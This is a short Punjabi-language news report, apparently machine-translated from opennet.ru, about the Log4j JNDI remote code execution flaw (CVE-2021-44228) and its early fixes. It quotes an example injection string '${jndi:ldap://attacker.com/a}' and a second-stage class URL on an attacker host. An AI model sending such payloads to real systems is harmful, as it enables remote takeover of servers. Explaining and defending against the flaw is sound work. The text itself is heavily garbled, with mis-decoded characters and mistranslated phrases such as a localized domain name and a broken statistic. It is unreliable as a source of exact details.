Apache Log4j, Java เจเจชเจฒเฉเจเฉเจธเจผเจจเจพเจ เจตเจฟเฉฑเจ เจฒเฉเจเจฟเฉฐเจ เจจเฉเฉฐ เจธเฉฐเจเจ เจฟเจค เจเจฐเจจ เจฒเจ เจเฉฑเจ เจชเฉเจฐเจธเจฟเฉฑเจง เจซเจฐเฉเจฎเจตเจฐเจ เจตเจฟเฉฑเจ, เจเฉฑเจ เจจเจพเจเจผเฉเจ เจเจฎเจเจผเฉเจฐเฉ เจฆเฉ เจชเจเจพเจฃ เจเฉเจคเฉ เจเจ เจนเฉ เจเฉ เจฒเฉเจ เจตเจฟเฉฑเจ โ{jndi:URL}โ เจซเจพเจฐเจฎเฉเจ เจตเจฟเฉฑเจ เจตเจฟเจธเจผเฉเจธเจผ เจฐเฉเจช เจตเจฟเฉฑเจ เจซเจพเจฐเจฎเฉเจ เจเฉเจคเฉ เจฎเฉเฉฑเจฒ เจจเฉเฉฐ เจฒเจฟเจเฉ เจเจพเจฃ 'เจคเฉ เจเจฐเจฌเจฟเจเจฐเจฐเฉ เจเฉเจก เจจเฉเฉฐ เจฒเจพเจเฉ เจเจฐเจจ เจฆเฉ เจเจเจพเจเจผเจค เจฆเจฟเฉฐเจฆเจพ เจนเฉเฅค เจนเจฎเจฒเจพ เจเจพเจตเจพ เจเจชเจฒเฉเจเฉเจธเจผเจจเจพเจ 'เจคเฉ เจเฉเจคเจพ เจเจพ เจธเจเจฆเจพ เจนเฉ เจเฉ เจฌเจพเจนเจฐเฉ เจธเจฐเฉเจคเจพเจ เจคเฉเจ เจชเฉเจฐเจพเจชเจค เจฎเฉเฉฑเจฒเจพเจ เจจเฉเฉฐ เจฒเฉเจ เจเจฐเจฆเฉ เจนเจจ, เจเจฆเจพเจนเจฐเจจ เจฒเจ, เจเจฒเจคเฉ เจธเฉเจจเฉเจนเจฟเจเจ เจตเจฟเฉฑเจ เจธเจฎเฉฑเจธเจฟเจ เจตเจพเจฒเฉ เจฎเฉเฉฑเจฒเจพเจ เจจเฉเฉฐ เจชเฉเจฐเจฆเจฐเจธเจผเจฟเจค เจเจฐเจฆเฉ เจธเจฎเฉเจเฅค
เจเจน เจจเฉเจ เจเฉเจคเจพ เจเจฟเจ เจนเฉ เจเจฟ เจ เจชเจพเจเฉ เจธเจเฉเจฐเจเจธ, เจ เจชเจพเจเฉ เจธเฉเจฒเจฐ, เจ เจชเจพเจเฉ เจกเจฐเฉเจเจก เจเจพเจ เจ เจชเจพเจเฉ เจซเจฒเจฟเฉฐเจ เจตเจฐเจเฉ เจซเจฐเฉเจฎเจตเจฐเจ เจฆเฉ เจตเจฐเจคเฉเจ เจเจฐเจจ เจตเจพเจฒเฉ เจฒเจเจญเจ เจธเจพเจฐเฉ เจชเฉเจฐเฉเจเฉเจเจ เจธเจฎเฉฑเจธเจฟเจ เจจเจพเจฒ เจชเฉเจฐเจญเจพเจตเจฟเจค เจนเฉเฉฐเจฆเฉ เจนเจจ, เจเจฟเจธ เจตเจฟเฉฑเจ เจธเจเฉเจฎ, เจเจชเจฒ เจเจเจเจฒเจพเจเจก, เจฎเจพเจเจจเจเจฐเจพเจซเจ เจเจฒเจพเจเฉฐเจเจธ เจ เจคเฉ เจธเจฐเจตเจฐ เจธเจผเจพเจฎเจฒ เจนเจจเฅค เจเจน เจเจฎเฉเจฆ เจเฉเจคเฉ เจเจพเจเจฆเฉ เจนเฉ เจเจฟ เจเจฎเจเจผเฉเจฐเฉ เจเจพเจฐเจชเฉเจฐเฉเจ เจเจชเจฒเฉเจเฉเจธเจผเจจเจพเจ 'เจคเฉ เจตเฉฑเจกเฉ เจนเจฎเจฒเจฟเจเจ เจฆเฉ เจเฉฑเจ เจฒเจนเจฟเจฐ เจฆเฉ เจ เจเจตเจพเจ เจเจฐ เจธเจเจฆเฉ เจนเฉ, เจ เจชเจพเจเฉ เจธเจเฉเจฐเจเจธ เจซเจฐเฉเจฎเจตเจฐเจ เจตเจฟเฉฑเจ เจจเจพเจเจผเฉเจ เจเจฎเจเจผเฉเจฐเฉเจเจ เจฆเฉ เจเจคเจฟเจนเจพเจธ เจจเฉเฉฐ เจฆเฉเจนเจฐเจพเจเจเจฆเฉ เจนเฉเจ, เจเฉ เจเจฟ เจเฉฑเจ เจฎเฉเจเฉ เจ เฉฐเจฆเจพเจเจผเฉ เจ เจจเฉเจธเจพเจฐ, เจตเฉเจฌ เจเจชเจฒเฉเจเฉเจธเจผเจจเจพเจ เจตเจฟเฉฑเจ เจซเจพเจฐเจเฉเจจ เจฆเฉ 65% เจฆเฉเจเจฐเจพ เจตเจฐเจคเฉ เจเจพเจเจฆเฉ เจนเฉ. 100 เจเฉฐเจชเจจเฉเจเจเฅค เจเจฎเจเจผเฉเจฐ เจธเจฟเจธเจเจฎเจพเจ เจฒเจ เจจเฉเฉฑเจเจตเจฐเจ เจจเฉเฉฐ เจธเจเฉเจจ เจเจฐเจจ เจฆเฉเจเจ เจเฉเจธเจผเจฟเจธเจผเจพเจ เจธเจฎเฉเจคเฅค
เจธเจฎเฉฑเจธเจฟเจ เจเจธ เจคเฉฑเจฅ เจคเฉเจ เจตเจง เจเจ เจนเฉ เจเจฟ เจเฉฑเจ เจเจพเจฐเจเจธเจผเฉเจฒ เจธเจผเฉเจธเจผเจฃ เจชเจนเจฟเจฒเจพเจ เจนเฉ เจชเฉเจฐเจเจพเจธเจผเจฟเจค เจเฉเจคเจพ เจเจพ เจเฉเฉฑเจเจพ เจนเฉ, เจชเจฐ เจธเจฅเจฟเจฐ เจธเจผเจพเจเจพเจตเจพเจ เจฒเจ เจซเจฟเจเจธ เจ เจเฉ เจตเฉ เจธเฉฐเจเจฒเจฟเจค เจจเจนเฉเจ เจเฉเจคเฉ เจเจ เจนเจจ. CVE เจชเจเจพเจฃเจเจฐเจคเจพ เจ เจเฉ เจคเฉฑเจ เจจเจฟเจฐเจงเจพเจฐเจค เจจเจนเฉเจ เจเฉเจคเจพ เจเจฟเจ เจนเฉเฅค เจซเจฟเจเจธ เจธเจฟเจฐเจซ log4j-2.15.0-rc1 เจเฉเจธเจ เจธเจผเจพเจเจพ เจตเจฟเฉฑเจ เจธเจผเจพเจฎเจฒ เจนเฉเฅค เจเจฎเจเจผเฉเจฐเฉ เจจเฉเฉฐ เจฐเฉเจเจฃ เจฒเจ เจเฉฑเจ เจนเฉฑเจฒ เจตเจเฉเจ, log4j2.formatMsgNoLookups เจชเฉเจฐเจพเจฎเฉเจเจฐ เจจเฉเฉฐ เจธเจนเฉ 'เจคเฉ เจธเฉเฉฑเจ เจเจฐเจจ เจฆเฉ เจธเจฟเจซเจพเจฐเจธเจผ เจเฉเจคเฉ เจเจพเจเจฆเฉ เจนเฉเฅค
เจธเจฎเฉฑเจธเจฟเจ เจเจธ เจคเฉฑเจฅ เจฆเฉ เจเจพเจฐเจจ เจนเฉเจ เจธเฉ เจเจฟ log4j เจฒเฉเจ เจฒเจ เจฒเจพเจเจจ เจเจเจเจชเฉเฉฑเจ เจตเจฟเฉฑเจ เจตเจฟเจธเจผเฉเจธเจผ เจฎเจพเจธเจ "{}" เจจเฉเฉฐ เจชเฉเจฐเฉเจธเฉเจธ เจเจฐเจจ เจฆเจพ เจธเจฎเจฐเจฅเจจ เจเจฐเจฆเจพ เจนเฉ, เจเจฟเจธ เจตเจฟเฉฑเจ JNDI (เจเจพเจตเจพ เจจเฉเจฎเจฟเฉฐเจ เจ เจคเฉ เจกเจพเจเจฐเฉเจเจเจฐเฉ เจเฉฐเจเจฐเจซเฉเจธ) เจชเฉเฉฑเจเจเจฟเฉฑเจเจพเจ เจจเฉเฉฐ เจเจฒเจพเจเจ เจเจพ เจธเจเจฆเจพ เจนเฉเฅค เจนเจฎเจฒเจพ "${jndi:ldap://attacker.com/a}" เจฆเฉ เจฌเจฆเจฒ เจจเจพเจฒ เจเฉฑเจ เจธเจคเจฐ เจจเฉเฉฐ เจชเจพเจธ เจเจฐเจจ เจฒเจ เจเจฌเจพเจฒเจฆเจพ เจนเฉ, เจเจฟเจธ เจฆเฉ เจชเฉเจฐเจเจฟเจฐเจฟเจ เจเจฐเจจ 'เจคเฉ log4j เจนเจฎเจฒเจพเจตเจฐ.com เจธเจฐเจตเจฐ เจจเฉเฉฐ Java เจเจฒเจพเจธ เจฆเฉ เจฎเจพเจฐเจ เจฒเจ เจเฉฑเจ LDAP เจฌเฉเจจเจคเฉ เจญเฉเจเฉเจเจพเฅค . เจนเจฎเจฒเจพเจตเจฐ เจฆเฉ เจธเจฐเจตเจฐ เจฆเฉเจเจฐเจพ เจตเจพเจชเจธ เจเฉเจคเจพ เจเจฟเจ เจฎเจพเจฐเจ (เจเจฆเจพเจนเจฐเจจ เจฒเจ, http://second-stage.attacker.com/Exploit.class) เจฎเฉเจเฉเจฆเจพ เจชเฉเจฐเจเจฟเจฐเจฟเจ เจฆเฉ เจธเฉฐเจฆเจฐเจญ เจตเจฟเฉฑเจ เจฒเฉเจก เจ เจคเฉ เจเจเจเจผเฉเจเจฟเจเจ เจเฉเจคเจพ เจเจพเจตเฉเจเจพ, เจเฉ เจนเจฎเจฒเจพเจตเจฐ เจจเฉเฉฐ เจเจฐเจฌเจฟเจเจฐเฉเจฐเฉ เจเฉเจก เจจเฉเฉฐ เจเจฒเจพเจเจฃ เจฆเฉ เจเจเจพเจเจผเจค เจฆเจฟเฉฐเจฆเจพ เจนเฉเฅค เจฎเฉเจเฉเจฆเจพ เจเจชเจฒเฉเจเฉเจธเจผเจจ เจฆเฉ เจ เจงเจฟเจเจพเจฐเจพเจ เจตเจพเจฒเจพ เจธเจฟเจธเจเจฎเฅค
เจเฉเฉ 1: เจเจฎเจเจผเฉเจฐเฉ เจจเฉเฉฐ เจชเจเจพเจฃเจเจฐเจคเจพ CVE-2021-44228 เจจเจฟเจฐเจงเจพเจฐเจค เจเฉเจคเจพ เจเจฟเจ เจนเฉเฅค
เจเจกเฉเจเจกเจฎ 2: เจฐเฉเจฒเฉเจเจผ log4j-2.15.0-rc1 เจฆเฉเจเจฐเจพ เจเฉเฉเฉ เจเจ เจธเฉเจฐเฉฑเจเจฟเจ เจจเฉเฉฐ เจฌเจพเจเจชเจพเจธ เจเจฐเจจ เจฆเจพ เจคเจฐเฉเจเจพ เจชเจเจพเจฃเจฟเจ เจเจฟเจ เจนเฉเฅค เจเฉฑเจ เจจเจตเจพเจ เจ
เจชเจกเฉเจ, log4j-2.15.0-rc2, เจเจฎเจเจผเฉเจฐเฉ เจฆเฉ เจตเจฟเจฐเฉเฉฑเจง เจตเจงเฉเจฐเฉ เจธเฉฐเจชเฉเจฐเจจ เจธเฉเจฐเฉฑเจเจฟเจ เจฆเฉ เจจเจพเจฒ เจชเฉเจฐเจธเจคเจพเจตเจฟเจค เจเฉเจคเจพ เจเจฟเจ เจนเฉเฅค เจเฉเจก เจเจฒเจค เจขเฉฐเจ เจจเจพเจฒ เจซเจพเจฐเจฎเฉเจ เจเฉเจคเฉ JNDI URL เจฆเฉ เจตเจฐเจคเฉเจ เจเจฐเจจ เจฆเฉ เจฎเจพเจฎเจฒเฉ เจตเจฟเฉฑเจ เจเฉฑเจ เจ
เจธเจงเจพเจฐเจจ เจธเจฎเจพเจชเจคเฉ เจฆเฉ เจ
เจฃเจนเฉเจเจฆ เจจเจพเจฒ เจธเฉฐเจฌเฉฐเจงเจฟเจค เจคเจฌเจฆเฉเจฒเฉ เจจเฉเฉฐ เจเจเจพเจเจฐ เจเจฐเจฆเจพ เจนเฉเฅค
เจธเจฐเฉเจค: opennet.ru